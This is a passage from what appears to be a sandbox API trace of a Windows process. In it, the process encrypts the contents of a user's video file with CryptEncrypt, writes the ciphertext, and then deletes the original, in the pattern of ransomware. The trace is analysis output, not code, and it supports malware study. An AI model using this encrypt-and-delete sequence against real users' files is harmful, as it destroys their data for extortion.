dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d02d8 | out: hHeap=0x1780000) returned 1 [0105.769] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e2ba0, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2ba0*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0105.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0378 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0105.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0105.771] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0105.771] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0105.771] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0105.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0105.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03c8 | out: hHeap=0x1780000) returned 1 [0105.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0105.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41acbc0 | out: hHeap=0x1780000) returned 1 [0105.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0105.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0105.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0105.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0105.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0105.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0105.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0105.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0105.772] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0105.772] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.772] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0105.772] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0105.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0105.772] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0x3394, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0x33a0) returned 1 [0105.773] CharLowerBuffW (in: lpsz="byte[13217]", cchLength=0xb | out: lpsz="byte[13217]") returned 0xb [0105.773] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.773] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0105.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb198, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0105.773] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x451faf0*, pdwDataLen=0x144de30*=0x3394, dwBufLen=0x33a0 | out: pbData=0x451faf0*, pdwDataLen=0x144de30*=0x33a0) returned 1 [0105.773] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0105.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0105.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.773] WriteFile (in: hFile=0x298, lpBuffer=0x45193b8*, nNumberOfBytesToWrite=0x33a0, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x45193b8*, lpNumberOfBytesWritten=0x144e834*=0x33a0, lpOverlapped=0x0) returned 1 [0105.775] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0105.775] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.775] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0105.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caac0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0105.775] CryptDestroyKey (hKey=0x41ac000) returned 1 [0105.775] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0105.775] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0105.775] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.775] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0105.775] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0105.822] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.822] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.823] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0105.823] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0105.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0105.823] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0105.823] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.823] FreeLibrary (hLibModule=0x756e0000) returned 1 [0105.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0105.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0105.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0105.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0105.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0105.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0105.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0105.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0105.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0105.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0105.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0105.824] CloseHandle (hObject=0x258) returned 1 [0105.824] CloseHandle (hObject=0x298) returned 1 [0105.826] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\jgIUi-yVs0307RW IcX.mkv", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\jgIUi-yVs0307RW IcX.mkv", lpFilePart=0x0) returned 0x64 [0105.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d3920 [0105.827] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\jgIUi-yVs0307RW IcX.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\jgiui-yvs0307rw icx.mkv")) returned 0x20 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0105.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x43eb810 [0105.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a88c8 [0105.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0105.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8388 [0105.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb810 | out: hHeap=0x1780000) returned 1 [0105.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0105.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0105.827] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0105.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0105.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0105.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a88c8 | out: hHeap=0x1780000) returned 1 [0105.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0105.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0105.828] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0105.828] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\jgIUi-yVs0307RW IcX.mkv", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b76150, ftCreationTime.dwHighDateTime=0x1d5ec8d, ftLastAccessTime.dwLowDateTime=0x60d86c30, ftLastAccessTime.dwHighDateTime=0x1d5e5c2, ftLastWriteTime.dwLowDateTime=0x60d86c30, ftLastWriteTime.dwHighDateTime=0x1d5e5c2, nFileSizeHigh=0x0, nFileSizeLow=0x3394, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="jgIUi-yVs0307RW IcX.mkv", cAlternateFileName="JGIUI-~1.MKV")) returned 0x41ac700 [0105.828] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\jgIUi-yVs0307RW IcX.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\jgiui-yvs0307rw icx.mkv")) returned 1 [0106.414] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b76150, ftCreationTime.dwHighDateTime=0x1d5ec8d, ftLastAccessTime.dwLowDateTime=0x60d86c30, ftLastAccessTime.dwHighDateTime=0x1d5e5c2, ftLastWriteTime.dwLowDateTime=0x60d86c30, ftLastWriteTime.dwHighDateTime=0x1d5e5c2, nFileSizeHigh=0x0, nFileSizeLow=0x3394, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="jgIUi-yVs0307RW IcX.mkv", cAlternateFileName="JGIUI-~1.MKV")) returned 0 [0106.414] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0106.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8388 | out: hHeap=0x1780000) returned 1 [0106.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0106.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0106.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0106.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d3920 | out: hHeap=0x1780000) returned 1 [0106.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0106.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0106.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0106.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0106.415] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 1 [0106.415] TranslateMessage (lpMsg=0x144ebd4) returned 0 [0106.415] DispatchMessageW (lpMsg=0x144ebd4) returned 0x0 [0106.415] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0106.416] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0106.416] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 